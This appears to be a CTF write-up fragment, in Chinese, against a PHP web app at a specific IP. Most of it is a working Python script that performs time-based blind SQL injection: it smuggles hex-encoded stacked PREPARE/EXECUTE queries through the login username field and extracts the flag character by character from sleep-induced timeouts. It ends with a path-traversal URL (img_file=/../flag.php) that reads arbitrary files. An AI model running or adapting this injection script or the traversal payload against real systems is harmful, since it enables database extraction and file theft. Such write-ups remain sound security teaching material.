时间盲注脚本(把 SQL 十六进制编码后通过堆叠的 SET/PREPARE/EXECUTE 执行,以 sleep(5) 触发的读超时作为真/假判断依据,逐字符爆出 flag):
# coding=utf-8
import re
import requests
import sys
import binascii
import json
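# Python 2 only: the interpreter's default codec is ASCII, which breaks the
# implicit str/unicode mixing in this script.  On Python 3 ``reload`` is not a
# builtin and str is already Unicode, so the hack is skipped instead of
# crashing with NameError on the first line.
if sys.version_info[0] < 3:
    reload(sys)
    sys.setdefaultencoding("utf8")
# Target login endpoint (CTF box); the injection rides in the JSON body.
url = "http://182.92.220.157:11116/index.php?r=Login/Login"
# Recovered flag characters are appended here one at a time.
flag = ""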
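def str_to_hex(s):
    """Return *s* as a lowercase hex string, exactly two digits per UTF-8 byte.

    The result is spliced into a MySQL ``0x...`` literal, which needs an even
    number of digits.  The old ``hex(ord(c))`` form emitted a single digit for
    code points below 0x10 (e.g. tab -> "9") and more than two for non-ASCII,
    silently shifting every following byte; encoding to UTF-8 and hexlifying
    the bytes keeps the output aligned for any input.

    Args:
        s: text (or bytes) to encode.

    Returns:
        Hex string with no ``0x`` prefix; empty input yields "".
    """
    if not isinstance(s, bytes):
        s = s.encode("utf-8")
    return binascii.hexlify(s).decode("ascii")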
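# Time-based blind extraction: one request per (position, candidate char).
# The injected SELECT sleeps 5 s when the guess is right and a 4 s read
# timeout is the oracle, so "timed out" means "match".  Network jitter can
# push an honest response past 4 s and yield a false positive -- re-run (or
# re-probe a suspicious character) before trusting the result.
CHARSET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_,!@#$%^&*``."
for i in range(1, 40):
    print(i)
    for str1 in CHARSET:
        # Compare ascii() of the i-th character of the concatenated flag rows
        # with the candidate's code point.  The candidate itself never enters
        # the SQL text, so quote characters are safe to probe.
        sql = ("select if((ascii(substr((select group_concat(flag) from flag),"
               + str(i) + ",1))='" + str(ord(str1)) + "'),sleep(5),2);")  # ctf
        # Hex-encode so the statement survives the login form's quoting, then
        # run it as a stacked query via PREPARE/EXECUTE after breaking out of
        # the username literal.
        sql_hex = str_to_hex(sql)
        data = {
            "username": "1';SET @a=0x" + str(sql_hex) + ";PREPARE st FROM @a;EXECUTE st;",
            "password": "admin'",
        }
        try:
            # Response body is irrelevant; only the timing carries information.
            requests.post(url, json=data, timeout=4)
        except requests.exceptions.ReadTimeout:
            flag += str1
            print(flag)
            break
    else:
        # No candidate matched at this position: either the flag ended or it
        # contains a character outside CHARSET.  Stop here instead of silently
        # skipping the position, which would corrupt every later character and
        # burn len(CHARSET) requests per remaining position.
        print("no match at position %d, stopping" % i)
        break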
print(flag)
运行结果是 AmOL#T.zip
下载下来是源码,进行代码审计
发现 User/Index 的 img_file 参数存在路径穿越导致的任意文件读取漏洞:传入 /../flag.php 即可跳出预期目录,直接读到 flag.php 的源码
http://182.92.220.157:11116/index.php?r=User/Index&img_file=/../flag.php

